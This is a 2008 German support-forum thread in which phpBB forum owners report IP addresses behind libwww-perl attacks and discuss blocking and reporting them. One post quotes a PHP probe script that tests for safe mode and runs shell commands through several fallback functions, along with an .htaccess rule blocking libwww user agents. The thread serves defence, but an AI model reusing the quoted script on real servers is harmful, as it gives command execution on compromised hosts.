xa-media.com | Support Forum

Hilfestellung und Support zu unseren Webmaster Projekten

 

Hier erhältst du Hilfestellung und Support zu folgenden Projekten:
- BBoard.de
- Forenfuchs.de
- iphpbb.com
- xa-board.com

Zu anderen Foren Services können wir leider keinen Support geben. Wende dich bitte hierfür an den zuständigen Hoster!

Bevor du postest, beachte bitte folgende Punkte:
- FAQ und phpbb Doku lesen.
- Forensuche benutzen

Es ist notwendig bei jeder Anfrage die Adresse zu deinem Forum mit anzugeben, da wir sonst nicht weiterhelfen und somit die Anfrage nicht bearbeiten können. Weiters bitten wir dich immer zuerst die "News & Ankündigungen" zu lesen, bevor du postest. Danke :)

Hacker ? Bitte hier mit IP melden !!!

Alle Probleme betreffend der neuen phpbb Version bitte hier kundtun. Forenurl nicht vergessen.

Re: libwww-perl = Hacker ? Bitte nicht !!!!!!!

Beitragvon aristoteles » 25.01.2008, 20:31

Hi,

der Kollege war gerade bei mir da ---> libwww-perl/5.808 Gast IP: 64.38.24.138 » Whois
Ist das für dich noch von Bedeutung Chris :?: :?: :?:

LG Ari :hallo:
Benutzeravatar
aristoteles
Mitglied
Mitglied
 
Beiträge: 62
Registriert: 09.07.2007, 19:24

Re: libwww-perl = Hacker ? Bitte nicht !!!!!!!

Beitragvon chris » 25.01.2008, 23:18

ja danke fürs melden. ist auch ein unnötiger zeitgenosse ;)
-> Kein support per PN !!
-> Bist du mit unserem Support zufrieden, dann werde Fan von xa-media auf Facebook
Benutzeravatar
chris
Administrator
Administrator
 
Beiträge: 17025
Registriert: 16.07.2003, 17:54
Wohnort: Gmunden

Re: libwww-perl = Hacker ? Bitte nicht !!!!!!!

Beitragvon Markus Giersch » 26.01.2008, 22:06

inetnum: 84.136.0.0 - 84.191.255.255
netname: DTAG-DIAL20
descr: Deutsche Telekom AG
country: DE
admin-c: DTIP
tech-c: DTST
status: ASSIGNED PA
remarks: ******************************************************************
remarks: * Abuse Contact: http://www.t-com.de/ip-abuse in case of Spam, *
remarks: * Hack Attacks, Illegal Activity, Violation, Scans, Probes, etc. *
remarks: ******************************************************************
mnt-by: DTAG-NIC
source: RIPE # Filtered

auch dieser vogel hat meinen pc zum abkacken bekommen.
hallo, wann hören den diese DoS-Attacken endlich auf?

ich bin am verzweifeln - ich bin allerdings dankbar dafür, das dem forum dank chris seinem einsatz nichts passiert :-)
Markus Giersch
Foren Ass
Foren Ass
 
Beiträge: 126
Registriert: 18.06.2007, 22:26
Wohnort: Frankfurt am Main

Re: Hacker ? Bitte hier mit IP melden !!!

Beitragvon Markus Giersch » 26.01.2008, 22:17

und der nächste:

195.225.196.0 - 195.225.199.255
wieder Libwww-perl/5.808

diesemal haue ich denen aberauf die frese

Guiollettstrasse 48
60325 Frankfurt

morgen laufen wir dort ein - so ein pech aber auch das die den server gerade um die ecke von uns haben
Markus Giersch
Foren Ass
Foren Ass
 
Beiträge: 126
Registriert: 18.06.2007, 22:26
Wohnort: Frankfurt am Main

Re: Hacker ? Bitte hier mit IP melden !!!

Beitragvon krazykrizz » 26.01.2008, 23:22

Sehr schön, geig den Jungs mal schön die Meinung und zieh den Stecker! Dank auch an Chris und die anderen fleißigen Support-Hände, die uns solche Halunken vom Hals halten.

Daumen hoch, Leute!
Benutzeravatar
krazykrizz
Foren Ass
Foren Ass
 
Beiträge: 146
Registriert: 25.09.2007, 21:51

Re: Hacker ? Bitte hier mit IP melden !!!

Beitragvon Markus Giersch » 27.01.2008, 13:35

wobei, server zerstören ist keine gute idee,
ich glaube es reicht, wenn die wissen man weis bescheid.

da muss man anders vorgehen als mit server zerstörung.
letzendendes bauen die sich dann einfach woanders server auf.

ne anzeige muss her
Markus Giersch
Foren Ass
Foren Ass
 
Beiträge: 126
Registriert: 18.06.2007, 22:26
Wohnort: Frankfurt am Main

Re: Hacker ? Bitte hier mit IP melden !!!

Beitragvon chris » 27.01.2008, 18:59

kann durchaus ein gehackter server sein. aber wenns ums eck ist gib denen einfach mal bescheid
-> Kein support per PN !!
-> Bist du mit unserem Support zufrieden, dann werde Fan von xa-media auf Facebook
Benutzeravatar
chris
Administrator
Administrator
 
Beiträge: 17025
Registriert: 16.07.2003, 17:54
Wohnort: Gmunden

Re: Hacker ? Bitte hier mit IP melden !!!

Beitragvon Markus Giersch » 28.01.2008, 15:01

tsja, die leute haben mich angeschaut wie ein auto.

erst wollten die einfach nur blocken und davon gar nichts wissen,
als ich gesagt habe das in 5 minuten die polizei vor der haustür stehen wird wenn die mir nicht zuhören - dann haben sie mir zugehört.
und ganz nebenbei ist denen auch noch die kinnlade runter gefallen.
die hätten das nicht für möglich gehalten.

jetzt können die 40 server zerlegen und durchsuchen :-)

tsja, sollen froh sein das ich die nett angezeigt habe - und dafür sind die nun durchaus dankbar.
da sie selber gesehen habe, ups, das ist ja tatsächlich unsere IP...

also, das war ein bürogebäude in ffm nähe deutsche bank zentrale.
dort sind einige capitalfirmen, rechtsanwälte UND natürlich eine IT FIRMA...

mal schauen. zumindest hat jetzt der spuck schlagartig aufgehört bei mir
Markus Giersch
Foren Ass
Foren Ass
 
Beiträge: 126
Registriert: 18.06.2007, 22:26
Wohnort: Frankfurt am Main

Re: Hacker ? Bitte hier mit IP melden !!!

Beitragvon Markus Giersch » 06.02.2008, 00:26

...XxX...

irgendwie wird man aus der sache nicht ganz schlau.
habe aber auch kein bock mehr mich darum zu kümmern.

ich kann nur dringenst empfehlen:
pc an, firewall an, router an, modem an.
und zwar genau in dieser reihenfolge :-)

hier für Chris:
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}

if($contrs == 0){
echo("FUCKSAFEMODEOFFBYMIC22");
}else{
echo("FUCKSAFEMODEONBYMIC22");
}

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

für gewöhnlich bauen die solche scripts über das forum in das forum rein.
sind ja 08/15 scripts... oder?

nd das sollte der code sein um die Libwww-perl kaspers wieder los zu werden

RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]

das muss in die .htaccess von iphpbb - aber das wird chris bestimmt besser wissen als ich
Markus Giersch
Foren Ass
Foren Ass
 
Beiträge: 126
Registriert: 18.06.2007, 22:26
Wohnort: Frankfurt am Main

Re: Hacker ? Bitte hier mit IP melden !!!

Beitragvon chris » 06.02.2008, 14:29

libwww hab ich mal so gesperrt, mal schaun obs hilft.

besteht irgendein verdacht dass das script eingeschleust wurde oder hast du das nur bei deinen recherchen nach libwww gefunden
-> Kein support per PN !!
-> Bist du mit unserem Support zufrieden, dann werde Fan von xa-media auf Facebook
Benutzeravatar
chris
Administrator
Administrator
 
Beiträge: 17025
Registriert: 16.07.2003, 17:54
Wohnort: Gmunden

VorherigeNächste

Zurück zu iphpbb3.com - phpbb3

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 18 Gäste

cron